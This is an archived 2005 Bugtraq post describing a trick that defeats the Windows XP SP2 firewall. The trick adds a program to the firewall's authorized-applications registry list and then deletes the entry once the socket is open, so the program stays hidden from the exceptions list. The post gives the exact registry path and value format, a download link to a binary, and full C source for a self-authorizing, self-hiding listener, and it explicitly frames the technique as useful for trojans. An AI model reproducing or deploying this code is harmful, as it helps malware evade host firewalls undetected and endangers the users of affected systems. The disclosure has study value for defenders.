anti Windows XP SP2 firewall trick

crusoe_at_alexandria.cc
Date: 09/07/05

  • Next message: Martin Schulze: "[SECURITY] [DSA 803-1] New Apache packages fix HTTP request smuggling" 
    Date: 7 Sep 2005 20:34:50 -0000
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is) 1.9.2005
    Mark Kica
    crusoe@alexandria.cc
    FEI AI Technical University Kosice
    #Dedicated to Katka H. from Levoca

         How to avoid of detection of server application on Windows XP SP2 firewall

    ###############################################################################
    #Q:How safe is Windows XP SP2 firewall ?
    #A:Not very...

     This trick use only modification of registry keys.Windows Xp SP2 firewall have
    list of allowed program in register which are not blocked.If you add new key
    to it,your server (malware or trojane) can run freely.

    also server can be invisible in following list

    start->control panel->windows firewall->exceptions

    It will become invisible from this list because after you create socket,you can remove registry string value of your server and connection wont be aborted

    Other way how to bypass SP2 firewall ,is to create trojan not as server,but
    as client.

    ##################################################################

    http://taekwondo-itf.szm.sk/bugg.zip

    Test :

    #c:\bugg.exe Server running on port 2001

    connect to server with :

    #telnet localhost 2001

    ##################################################################

    Our Registry path is

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

    and there you can create string value

    Value name Value

    C:\chat.exe ........ C:\chat.exe:*:Enabled:chat

    NO SPACES!!! in key name etc. _C:\chat.exe___

    #################################################################
    Tested on Windows XP 2005 center media edition with integrated SP2

    Source code
    (server use ezsocket lib)

    #include <stdio.h>
    #include <windows.h>
    #include <ezsocket.h>
    #include <conio.h>
    #include "Shlwapi.h"

    int main( int argc, char *argv [] )
        {
        char buffer[1024];
        char filename[1024];

        HKEY hKey;
        int i;

        GetModuleFileName(NULL, filename, 1024);

        strcpy(buffer, filename);
        strcat(buffer, ":*:Enabled:");
        strcat(buffer, "bugg");

        RegOpenKeyEx(

           HKEY_LOCAL_MACHINE,
           "SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",
           0,
           KEY_ALL_ACCESS,
           &hKey);

        RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
        
        int temp, sockfd, new_fd, fd_size;
        struct sockaddr_in remote_addr;

        fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
        fprintf(stdout, " This is not trojan \n");
        fprintf(stdout, " Opened port is :2001 \n");
        fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
        fprintf(stdout, "Dedicated to Katka H. from Levoca \n");

        sleep(3);

        if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
            return 0;
            

        for (; ; )
            {
            RegDeleteValue(hKey, filename);
              fd_size = sizeof(struct sockaddr_in);

            if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
                {
                perror("accept");
                continue;
                }
            temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
            fprintf(stdout, "Sended: Hello World\r\n");
            temp = recv(new_fd, buffer, 1024, 0);
            buffer[temp] = '\0';
            fprintf(stdout, "Recieved: %s\r\n", buffer);
            ezclose_socket(new_fd);
            RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

            if (!strcmp(buffer, "quit"))
                break;
            }

        ezsocket_exit();
       return 0;
        }
      

  • Next message: Martin Schulze: "[SECURITY] [DSA 803-1] New Apache packages fix HTTP request smuggling"

    Relevant Pages

    • Re: event ID29 time provider not available
      ... I understand that when you boot Windows Server 2003 you received an error ... This issue may occur if the Network Load Balancing service is referenced as ... Start Registry Editor. ... "NLB Failed to Start" Error Message on Windows 2000 If NLB Is Not Installed ...
      (microsoft.public.windows.server.general)
    • RE: Microsoft RPC DCOM exploit descriptions
      ... variant below, ... The services can be viewed in the Services Console in Windows ... the "Computer Browser" and "Server" services are no ... Delete the Registry Value: ...
      (Bugtraq)
    • RE: DSL & Dialup Not Working Under W2K
      ... After a remote client establishes a connection by using Dial-Up Networking, ... A "cannot find server or DNS" error occurs. ... Windows 2000 LAN clients cannot map a network drive to the server. ... If you use Registry Editor incorrectly, ...
      (microsoft.public.win2000.networking)
    • Re: Urgent!!! Windows Reboots continuously after Installing SP4
      ... After you tell the CD to go ahead and install Win2K Server, ... to the registry or possibly the drive folder structure. ... You will end up with a dual boot Windows Server. ... folder structure, and check the registry, backup registry and event ...
      (microsoft.public.win2000.general)
    • RE: No access to Shared Printer
      ... Windows NT and Windows 2000 Print Browsing Architecture ... This article contains information about modifying the registry. ... How Shared Printers Are Found ... Windows NT print server. ...
      (microsoft.public.win2000.printing)
    Loading